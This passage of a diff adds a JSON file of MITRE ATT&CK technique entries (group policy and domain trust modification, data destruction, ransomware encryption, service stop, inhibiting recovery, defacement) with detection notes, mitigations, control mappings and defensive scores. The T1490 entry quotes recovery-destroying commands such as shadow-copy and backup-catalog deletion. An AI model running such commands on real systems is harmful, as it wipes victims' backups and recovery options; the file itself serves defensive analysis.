+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.8071428571428572,
+        "adjusted_score": 0.8071428571428572,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "5.5",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "RA-5",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.2571428571428571,
+            "mitigation_score": 0.41818181818181815,
+            "detection_score": 0.08
+        },
+        "choke_point_score": 0.55,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1484.001",
+        "name": "Domain Policy Modification: Group Policy Modification",
+        "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predicable network path \\\\<DOMAIN>\\SYSVOL\\<DOMAIN>\\Policies\\.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001), [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105), [Create Account](https://attack.mitre.org/techniques/T1136), [Service Execution](https://attack.mitre.org/techniques/T1569/002),  and more.(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)(Citation: Mandiant M Trends 2016)(Citation: Microsoft Hacking Team Breach) Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.(Citation: Wald0 Guide to GPOs)\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.(Citation: Harmj0y SeEnableDelegationPrivilege Right)",
+        "url": "https://attack.mitre.org/techniques/T1484/001",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:\n\n* Event ID 5136 - A directory service object was modified\n* Event ID 5137 - A directory service object was created\n* Event ID 5138 - A directory service object was undeleted\n* Event ID 5139 - A directory service object was moved\n* Event ID 5141 - A directory service object was deleted\n\n\nGPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Creation",
+            "Active Directory: Active Directory Object Deletion",
+            "Active Directory: Active Directory Object Modification",
+            "Command: Command Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1484",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.19523809523809524,
+        "adjusted_score": 0.19523809523809524,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1484.002",
+        "name": "Domain Policy Modification: Domain Trust Modification",
+        "description": "Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.",
+        "url": "https://attack.mitre.org/techniques/T1484/002",
+        "tactics": [
+            "Defense Evasion",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes Set federation settings on domain and Set domain authentication.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)\n\nMonitor for PowerShell commands such as: Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\", or Update-MSOLFederatedDomain –DomainName: \"Federated Domain Name\" –supportmultipledomain.(Citation: Microsoft - Update or Repair Federated domain)",
+        "platforms": [
+            "Azure AD",
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Creation",
+            "Active Directory: Active Directory Object Modification",
+            "Command: Command Execution"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1484",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            }
+        ],
+        "cumulative_score": 0.18095238095238095,
+        "adjusted_score": 0.18095238095238095,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1485",
+        "name": "Data Destruction",
+        "description": "Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018)(Citation: Talos Olympic Destroyer 2018) Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from [Disk Content Wipe](https://attack.mitre.org/techniques/T1561/001) and [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\n\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.(Citation: Kaspersky StoneDrill 2017)(Citation: Unit 42 Shamoon3 2018) In some cases politically oriented image files have been used to overwrite data.(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Symantec Shamoon 2012)(Citation: FireEye Shamoon Nov 2016)(Citation: Palo Alto Shamoon Nov 2016)(Citation: Kaspersky StoneDrill 2017)(Citation: Talos Olympic Destroyer 2018).\n\nIn cloud environments, adversaries may leverage access to delete cloud storage, cloud storage accounts, machine images, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)",
+        "url": "https://attack.mitre.org/techniques/T1485",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Use process monitoring to monitor the execution and command-line parameters of binaries that could be involved in data destruction activity, such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the creation of suspicious files as well as high unusual file modification activity. In particular, look for large quantities of file modifications in user directories and under C:\\Windows\\System32\\.\n\nIn cloud environments, the occurrence of anomalous high-volume deletion events, such as the DeleteDBCluster and DeleteGlobalCluster events in AWS, or a high quantity of data deletion events, such as DeleteBucket, within a short period of time may indicate suspicious activity.",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Cloud Storage: Cloud Storage Deletion",
+            "Command: Command Execution",
+            "File: File Deletion",
+            "File: File Modification",
+            "Image: Image Deletion",
+            "Instance: Instance Deletion",
+            "Process: Process Creation",
+            "Snapshot: Snapshot Deletion",
+            "Volume: Volume Deletion"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1053",
+                "name": "Data Backup",
+                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                "url": "https://attack.mitre.org/mitigations/M1053"
+            }
+        ],
+        "cumulative_score": 0.3690899258437931,
+        "adjusted_score": 0.3690899258437931,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "11.1",
+            "11.2",
+            "11.3",
+            "11.4",
+            "11.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CP-10",
+            "CP-2",
+            "CP-7",
+            "CP-9",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.319047619047619,
+            "mitigation_score": 0.2727272727272727,
+            "detection_score": 0.37
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.0000423067961740376
+    },
+    {
+        "tid": "T1486",
+        "name": "Data Encrypted for Impact",
+        "description": "Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)\n\nTo maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)\n\nIn cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)",
+        "url": "https://attack.mitre.org/techniques/T1486",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.\n\nIn some cases, monitoring for unusual kernel driver installation activity can aid in detection.\n\nIn cloud environments, monitor for events that indicate storage objects have been anomalously replaced by copies.",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Cloud Storage: Cloud Storage Metadata",
+            "Cloud Storage: Cloud Storage Modification",
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1053",
+                "name": "Data Backup",
+                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                "url": "https://attack.mitre.org/mitigations/M1053"
+            }
+        ],
+        "cumulative_score": 0.30178426809523806,
+        "adjusted_score": 0.30178426809523806,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "11.1",
+            "11.2",
+            "11.3",
+            "11.4",
+            "11.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CP-10",
+            "CP-2",
+            "CP-6",
+            "CP-7",
+            "CP-9",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.23809523809523808,
+            "mitigation_score": 0.2909090909090909,
+            "detection_score": 0.18
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.01368903
+    },
+    {
+        "tid": "T1489",
+        "name": "Service Stop",
+        "description": "Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)",
+        "url": "https://attack.mitre.org/techniques/T1489",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Monitor processes and command-line arguments to see if critical processes are terminated or stop running.\n\nMonitor for edits for modifications to services and startup programs that correspond to services of high importance. Look for changes to services that do not correlate with known software, patch cycles, etc. Windows service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. Systemd service unit files are stored within the /etc/systemd/system, /usr/lib/systemd/system/, and /home/.config/systemd/user/ directories, as well as associated symbolic links.\n\nAlterations to the service binary path or the service startup type changed to disabled may be suspicious.\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: OS API Execution",
+            "Process: Process Creation",
+            "Process: Process Termination",
+            "Service: Service Metadata",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            },
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.5929510276190476,
+        "adjusted_score": 0.5929510276190476,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "3.12",
+            "4.1",
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "12.2",
+            "12.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-4",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "SC-46",
+            "SC-7",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.3476190476190476,
+            "mitigation_score": 0.41818181818181815,
+            "detection_score": 0.27
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.19533198
+    },
+    {
+        "tid": "T1490",
+        "name": "Inhibit System Recovery",
+        "description": "Adversaries may delete or remove built-in operating system data and turn off services designed to aid in the recovery of a corrupted system to prevent recovery.(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017) Operating systems may contain features that can help fix corrupted systems, such as a backup catalog, volume shadow copies, and automatic repair features. Adversaries may disable or delete system recovery features to augment the effects of [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486).(Citation: Talos Olympic Destroyer 2018)(Citation: FireEye WannaCry 2017)\n\nA number of native Windows utilities have been used by adversaries to disable or delete system recovery features:\n\n* vssadmin.exe can be used to delete all volume shadow copies on a system - vssadmin.exe delete shadows /all /quiet\n* [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) can be used to delete volume shadow copies - wmic shadowcopy delete\n* wbadmin.exe can be used to delete the Windows Backup Catalog - wbadmin.exe delete catalog -quiet\n* bcdedit.exe can be used to disable automatic Windows recovery features by modifying boot configuration data - bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no",
+        "url": "https://attack.mitre.org/techniques/T1490",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.\n\nMonitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\PreviousVersions\\DisableLocalPage).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Deletion",
+            "Process: Process Creation",
+            "Service: Service Metadata",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1053",
+                "name": "Data Backup",
+                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                "url": "https://attack.mitre.org/mitigations/M1053"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            }
+        ],
+        "cumulative_score": 0.6232270714285715,
+        "adjusted_score": 0.6232270714285715,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "11.1",
+            "11.2",
+            "11.3",
+            "11.4",
+            "11.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CP-10",
+            "CP-2",
+            "CP-7",
+            "CP-9",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.37142857142857144,
+            "mitigation_score": 0.36363636363636365,
+            "detection_score": 0.38
+        },
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.0517985
+    },
+    {
+        "tid": "T1491",
+        "name": "Defacement",
+        "description": "Adversaries may modify visual content available internally or externally to an enterprise network. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages. \n",
+        "url": "https://attack.mitre.org/techniques/T1491",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.\n\n",
+        "platforms": [
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "File: File Creation",
+            "File: File Modification",
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1491.001",
+                "name": "Defacement: Internal Defacement",
+                "url": "https://attack.mitre.org/techniques/T1491/001",
+                "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)",
+                "detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+                "mitigations": [
+                    {
+                        "mid": "M1053",
+                        "name": "Data Backup",
+                        "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                        "url": "https://attack.mitre.org/mitigations/M1053"
+                    }
+                ]
+            },
+            {
+                "tid": "T1491.002",
+                "name": "Defacement: External Defacement",
+                "url": "https://attack.mitre.org/techniques/T1491/002",
+                "description": "An adversary may deface systems external to an organization in an attempt to deliver messaging, intimidate, or otherwise mislead an organization or users. Externally-facing websites are a common victim of defacement; often targeted by adversary and hacktivist groups in order to push a political message or spread propaganda.(Citation: FireEye Cyber Threats to Media Industries)(Citation: Kevin Mandia Statement to US Senate Committee on Intelligence)(Citation: Anonymous Hackers Deface Russian Govt Site) [External Defacement](https://attack.mitre.org/techniques/T1491/002) may be used as a catalyst to trigger events, or as a response to actions taken by an organization or government. Similarly, website defacement may also be used as setup, or a precursor, for future attacks such as [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).(Citation: Trend Micro Deep Dive Into Defacement)",
+                "detection": "Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+                "mitigations": [
+                    {
+                        "mid": "M1053",
+                        "name": "Data Backup",
+                        "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                        "url": "https://attack.mitre.org/mitigations/M1053"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1053",
+                "name": "Data Backup",
+                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                "url": "https://attack.mitre.org/mitigations/M1053"
+            }
+        ],
+        "cumulative_score": 0.20238095238095238,
+        "adjusted_score": 0.20238095238095238,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "11.1",
+            "11.2",
+            "11.3",
+            "11.4",
+            "11.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CP-10",
+            "CP-2",
+            "CP-7",
+            "CP-9",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.15238095238095237,
+            "mitigation_score": 0.2727272727272727,
+            "detection_score": 0.02
+        },
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1491.001",
+        "name": "Defacement: Internal Defacement",
+        "description": "An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper.(Citation: Novetta Blockbuster) Disturbing or offensive images may be used as a part of [Internal Defacement](https://attack.mitre.org/techniques/T1491/001) in order to cause user discomfort, or to pressure compliance with accompanying messages. Since internally defacing systems exposes an adversary's presence, it often takes place after other intrusion goals have been accomplished.(Citation: Novetta Blockbuster Destructive Malware)",
+        "url": "https://attack.mitre.org/techniques/T1491/001",
+        "tactics": [
+            "Impact"
+        ],
+        "detection": "Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Application Log: Application Log Content",
+            "File: File Creation",
+            "File: File Modification",
+            "Network Traffic: Network Traffic Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1491",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1053",
+                "name": "Data Backup",
+                "description": "Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise.",
+                "url": "https://attack.mitre.org/mitigations/M1053"
+            }
+        ],
+        "cumulative_score": 0.20238095238095238,
+        "adjusted_score": 0.20238095238095238,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "11.1",
+            "11.2",
+            "11.3",
+            "11.4",
+            "11.5"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CM-2",
+            "CP-10",
+            "CP-2",
+            "CP-7",
+            "CP-9",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1491.002",
+        "name": "Defacement: External Defacement",
